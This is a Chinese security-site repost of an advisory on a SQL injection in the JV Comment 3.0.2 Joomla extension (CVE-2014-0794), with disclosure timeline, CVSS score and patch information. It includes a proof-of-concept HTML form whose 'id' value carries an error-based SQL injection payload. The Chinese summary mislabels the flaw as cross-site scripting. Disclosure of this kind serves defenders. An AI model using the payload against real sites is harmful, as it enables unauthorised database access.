Joomla! JV Comment扩展'id'参数SQL注入漏洞

发布日期:2014-01-02
更新日期:2014-02-10

受影响系统:
Joomla! JV Comment 3.0.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 64661
CVE(CAN) ID: CVE-2014-0794

JV Comment是Joomla!的一个扩展,可以将评论系统添加到文章内。

JV Comment for Joomla!(版本3.0.2),文件com_jvcomment在实现上存在跨站脚本漏洞,这可使远程攻击者在comment.like操作的id参数,利用此漏洞注入任意Web脚本或HTML,从而查看、添加、修改、删除后端数据库内的信息。

<*来源:High-Tech Bridge Security Research Lab
 
  链接:
       
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Advisory ID: HTB23195
Product: JV Comment Joomla Extension
Vendor: joomlavi.com
Vulnerable Version(s): 3.0.2 and probably prior
Tested Version: 3.0.2
Advisory Publication:  January 2, 2014  [without technical details]
Vendor Notification: January 2, 2014
Vendor Patch: January 14, 2014
Public Disclosure: January 23, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-0794
Risk Level: Medium
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in JV Comment Joomla Extension, which can be exploited to perform SQL Injection attacks.


1) SQL Injection in JV Comment Joomla Extension: CVE-2014-0794

The vulnerability exists due to insufficient validation of "id" HTTP POST parameter passed to "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.

The following exploitation example displays version of MySQL database:


<form action="http://[host]/index.php" method="post">
<input type="hidden" value="com_jvcomment">
<input type="hidden"  value="comment.like">
<input type="hidden"    value="1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))">
<input type="submit">
</form>


-----------------------------------------------------------------------------------------------

Solution:

Update to JV Comment 3.0.3

More Information:

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23195 - https://www.htbridge.com/advisory/HTB23195 - SQL Injection in JV Comment Joomla Extension.
[2] JV Comment Joomla Extension - - With JV Comment, adding a comment system to your articles is now as simple as installing a plug-in and adjusting a few parameters.
[3] Common Vulnerabilities and Exposures (CVE) - - international in scope and free for public use, CVE&#174; is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb&#174; - - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

建议:
--------------------------------------------------------------------------------
厂商补丁:

Joomla!
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

参考:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/368c50fde0842007e90ea13e2c97f964.html